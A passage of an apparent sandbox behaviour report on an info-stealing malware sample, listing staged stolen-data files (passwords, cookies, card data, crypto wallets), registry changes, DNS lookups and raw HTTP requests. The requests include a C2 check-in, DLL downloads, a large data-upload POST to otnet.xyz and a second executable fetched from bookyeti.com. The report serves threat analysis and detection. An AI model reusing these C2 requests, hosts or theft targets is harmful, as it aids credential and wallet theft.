  666. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  667. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  668. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  669. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
  670. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
  671. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
  672. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
  673. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
  674. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  675. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  676.  
  677.  
  678. * Deleted Files:
  679. "C:\\ProgramData\\freebl3.dll",
  680. "C:\\ProgramData\\mozglue.dll",
  681. "C:\\ProgramData\\msvcp140.dll",
  682. "C:\\ProgramData\\nss3.dll",
  683. "C:\\ProgramData\\softokn3.dll",
  684. "C:\\ProgramData\\vcruntime140.dll",
  685. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  686. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
  687. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  688. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
  689. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  690. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  691. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  692. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
  693. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  694. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  695. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
  696. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  697. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
  698. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  699. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
  700. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  701. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  702. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  703. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  704. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
  705. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
  706. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
  707. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
  708. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
  709. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
  710. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
  711. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
  712. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
  713. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
  714. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
  715. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
  716. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
  717. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
  718. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
  719. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
  720. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
  721. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
  722. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
  723. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
  724. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
  725. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
  726. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
  727. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
  728. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
  729. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
  730. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
  731. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
  732. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
  733. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
  734. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
  735. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  737. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
  738. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  739. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
  740. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  741. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
  742. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  743. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
  744. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  745. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  746.  
  747.  
  748. * Modified Registry Keys:
  749. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  750. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  751. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  752. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  753. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  754. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  755.  
  756.  
  757. * Deleted Registry Keys:
  758.  
  759. * DNS Communications:
  760.  
  761. "type": "A",
  762. "request": "otnet.xyz",
  763. "answers":
  764.  
  765. "data": "209.141.47.33",
  766. "type": "A"
  767.  
  768.  
  769.  
  770.  
  771. "type": "A",
  772. "request": "ip-api.com",
  773. "answers":
  774.  
  775. "data": "72.11.140.50",
  776. "type": "A"
  777.  
  778.  
  779. "data": "66.212.29.250",
  780. "type": "A"
  781.  
  782.  
  783.  
  784.  
  785. "type": "A",
  786. "request": "bookyeti.com",
  787. "answers":
  788.  
  789. "data": "199.204.213.10",
  790. "type": "A"
  791.  
  792.  
  793.  
  794.  
  795.  
  796. * Domains:
  797.  
  798. "ip": "209.141.47.33",
  799. "domain": "otnet.xyz"
  800.  
  801.  
  802. "ip": "72.11.140.50",
  803. "domain": "ip-api.com"   (NOTE(review): ip-api.com is a public IP-geolocation service, here apparently queried by the sample (GET /line/) to geolocate the victim. The resolved addresses 72.11.140.50 and 66.212.29.250 belong to that service and should not be treated as attacker infrastructure or blocked as C2; for detection, key on the request itself — a /line/ lookup from a non-browser process — rather than on the domain or IPs.)
  804.  
  805.  
  806. "ip": "199.204.213.10",
  807. "domain": "bookyeti.com"
  808.  
  809.  
  810.  
  811. * Network Communication - ICMP:
  812.  
  813. * Network Communication - HTTP:
  814.  
  815. "count": 1,
  816. "body": "--1BEF0A57BE110FD467A--\r\n",
  817. "uri": "http://otnet.xyz/141",   (NOTE(review): initial check-in to the C2 host. The POST carries an empty multipart form — the body is only the closing boundary, Content-Length 25 — with no User-Agent, no Referer and Accept-Language ru-RU; the numeric path is presumably a build/profile identifier. Host otnet.xyz (209.141.47.33) also serves the NSS/VC-runtime DLLs the sample fetches next and is the primary network IOC from this run.)
  818. "user-agent": "",
  819. "method": "POST",
  820. "host": "otnet.xyz",
  821. "version": "1.1",
  822. "path": "/141",
  823. "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  824. "port": 80
  825.  
  826.  
  827. "count": 1,
  828. "body": "",
  829. "uri": "http://otnet.xyz/freebl3.dll",
  830. "user-agent": "",
  831. "method": "GET",
  832. "host": "otnet.xyz",
  833. "version": "1.1",
  834. "path": "/freebl3.dll",
  835. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  836. "port": 80
  837.  
  838.  
  839. "count": 1,
  840. "body": "",
  841. "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  842. "user-agent": "",
  843. "method": "GET",
  844. "host": "otnet.xyz",
  845. "version": "1.1",
  846. "path": "/freebl3.dll?ddosprotected=1",
  847. "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  848. "port": 80
  849.  
  850.  
  851. "count": 1,
  852. "body": "",
  853. "uri": "http://otnet.xyz/mozglue.dll",
  854. "user-agent": "",
  855. "method": "GET",
  856. "host": "otnet.xyz",
  857. "version": "1.1",
  858. "path": "/mozglue.dll",
  859. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  860. "port": 80
  861.  
  862.  
  863. "count": 1,
  864. "body": "",
  865. "uri": "http://otnet.xyz/msvcp140.dll",
  866. "user-agent": "",
  867. "method": "GET",
  868. "host": "otnet.xyz",
  869. "version": "1.1",
  870. "path": "/msvcp140.dll",
  871. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  872. "port": 80
  873.  
  874.  
  875. "count": 1,
  876. "body": "",
  877. "uri": "http://otnet.xyz/nss3.dll",
  878. "user-agent": "",
  879. "method": "GET",
  880. "host": "otnet.xyz",
  881. "version": "1.1",
  882. "path": "/nss3.dll",
  883. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  884. "port": 80
  885.  
  886.  
  887. "count": 1,
  888. "body": "",
  889. "uri": "http://otnet.xyz/softokn3.dll",
  890. "user-agent": "",
  891. "method": "GET",
  892. "host": "otnet.xyz",
  893. "version": "1.1",
  894. "path": "/softokn3.dll",
  895. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  896. "port": 80
  897.  
  898.  
  899. "count": 2,
  900. "body": "",
  901. "uri": "http://otnet.xyz/vcruntime140.dll",
  902. "user-agent": "",
  903. "method": "GET",
  904. "host": "otnet.xyz",
  905. "version": "1.1",
  906. "path": "/vcruntime140.dll",
  907. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  908. "port": 80
  909.  
  910.  
  911. "count": 1,
  912. "body": "--1BEF0A57BE110FD467A--\r\n",
  913. "uri": "http://ip-api.com/line/",
  914. "user-agent": "",
  915. "method": "POST",
  916. "host": "ip-api.com",
  917. "version": "1.1",
  918. "path": "/line/",
  919. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  920. "port": 80
  921.  
  922.  
  923. "count": 1,
  924. "body": "",
  925. "uri": "http://otnet.xyz/",
  926. "user-agent": "",
  927. "method": "POST",
  928. "host": "otnet.xyz",
  929. "version": "1.1",
  930. "path": "/",
  931. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  932. "port": 80
  933.  
  934.  
  935. "count": 1,
  936. "body": "",
  937. "uri": "http://bookyeti.com/img/3001.exe",
  938. "user-agent": "",
  939. "method": "GET",
  940. "host": "bookyeti.com",
  941. "version": "1.1",
  942. "path": "/img/3001.exe",
  943. "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
  944. "port": 80
  945.  
  946.  
  947.  
  948. * Network Communication - SMTP:
  949.  
  950. * Network Communication - Hosts:
  951.  
  952. * Network Communication - IRC: